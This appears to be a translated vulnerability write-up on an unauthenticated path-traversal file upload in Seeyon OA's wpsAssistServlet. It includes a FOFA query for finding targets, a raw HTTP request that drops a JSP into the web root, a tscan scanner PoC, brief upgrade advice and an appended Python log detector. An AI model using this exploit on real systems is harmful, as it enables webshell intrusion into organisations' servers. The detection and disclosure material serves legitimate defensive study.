1. Vulnerability details
A vulnerability disclosed during the 2022 HVV (护网) exercise shows that the 致远OA (Seeyon OA) front end has an unauthenticated file upload vulnerability that can be used to obtain a shell (getshell).
2. Affected scope
Affected product versions: 致远A8, 致远A6
3. Reproduction
Search on FOFA with:
app="致远A8"
Vulnerable URL:
http://x.x.x.x:82/seeyon/wpsAssistServlet?flag=save&realFileType=/../../../ApacheJetspeed/webapps/ROOT/pc1.jsp&fileId=1
PoC:
POST /seeyon/wpsAssistServlet?flag=save&realFileType=/../../../ApacheJetspeed/webapps/ROOT/pc1.jsp&fileId=1 HTTP/1.1
Host: x.x.x.x:8099
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:98.0) Gecko/20100101 Firefox/98.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------120466775124259350661042728135
Connection: close
Cookie: JSESSIONID=C77EC989100FFE68041E88B49E6B38FF
Upgrade-Insecure-Requests: 1
Content-Length: 271

-----------------------------120466775124259350661042728135
Content-Disposition: form-data; name="upload"; filename="2.txt"
Content-Type: application/octet-stream

<%
out.println("Hello Wor111ld!");
%>
-----------------------------120466775124259350661042728135--
Burp:
Upload succeeded:
tscan PoC:
params: []
name: "致远OAwpsAssistServlet前台文件上传"
set: {}
rules:
  - method: POST
    path: /seeyon/wpsAssistServlet?flag=save&realFileType=/../../../ApacheJetspeed/webapps/ROOT/pc1.jsp&fileId=1
    headers:
      Content-Type: multipart/form-data; boundary=---------------------------120466775124259350661042728135
    body: |2-
      -----------------------------120466775124259350661042728135
      Content-Disposition: form-data; name="upload"; filename="2.txt"
      Content-Type: application/octet-stream

      <%
      out.println("Hello Wor111ld!");
      %>
      -----------------------------120466775124259350661042728135--
    search: ""
    followredirects: false
    expression: response.status==200
groups: {}
detail:
  author: ""
  links: []
  description: ""
  version: ""
4. Remediation
Upgrade to the latest version as soon as possible.
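As a defender-side complement to the upgrade advice, here is an added example (not part of the original post or of the vendor's code) that scans web-server access logs for wpsAssistServlet requests whose realFileType parameter carries path traversal or points at a JSP file, the pattern used by the PoC above; the log lines are constructed samples and the log format is assumed to be a common/combined-style format with the request line in quotes.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Constructed sample access-log lines (not taken from the original post).
# Line 1 mirrors the published PoC path; line 4 is the same idea URL-encoded.
SAMPLE_LOG = """\
10.0.0.5 - - [12/Aug/2022:10:01:02 +0800] "POST /seeyon/wpsAssistServlet?flag=save&realFileType=/../../../ApacheJetspeed/webapps/ROOT/pc1.jsp&fileId=1 HTTP/1.1" 200 0
10.0.0.6 - - [12/Aug/2022:10:01:05 +0800] "POST /seeyon/wpsAssistServlet?flag=save&realFileType=doc&fileId=1 HTTP/1.1" 200 0
10.0.0.7 - - [12/Aug/2022:10:01:09 +0800] "GET /seeyon/index.jsp HTTP/1.1" 200 512
10.0.0.8 - - [12/Aug/2022:10:02:11 +0800] "POST /seeyon/wpsAssistServlet?flag=save&realFileType=%2F..%2F..%2Fwebapps%2FROOT%2Fx.jsp&fileId=2 HTTP/1.1" 200 0
"""

# Extracts the quoted request line: method, request target, HTTP version.
LINE_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')


def is_suspicious_realfiletype(value: str) -> bool:
    """True if realFileType tries to leave the upload directory (traversal or
    absolute path) or names a server-executable JSP extension."""
    decoded = unquote(unquote(value)).replace("\\", "/")  # catch double-encoding
    if ".." in decoded or decoded.startswith("/"):
        return True
    return decoded.lower().rsplit(".", 1)[-1] in ("jsp", "jspx", "jspf")


def find_upload_traversal(log_text: str) -> list:
    """Return (client_ip, realFileType) for every wpsAssistServlet request whose
    realFileType parameter looks like a traversal / webshell-drop attempt."""
    hits = []
    for line in log_text.splitlines():
        m = LINE_RE.search(line)
        if not m:
            continue
        parts = urlsplit(m.group("target"))
        if not parts.path.endswith("/seeyon/wpsAssistServlet"):
            continue
        # parse_qs performs one round of percent-decoding on the values.
        for value in parse_qs(parts.query).get("realFileType", []):
            if is_suspicious_realfiletype(value):
                hits.append((line.split()[0], value))
    return hits


if __name__ == "__main__":
    for ip, rft in find_upload_traversal(SAMPLE_LOG):
        print(f"suspicious wpsAssistServlet upload from {ip}: realFileType={rft}")
```

A hit on a host that also shows a later GET for the same JSP name under /ROOT/ is a strong indication the upload landed and should trigger file-system triage of the Jetspeed webapps directory.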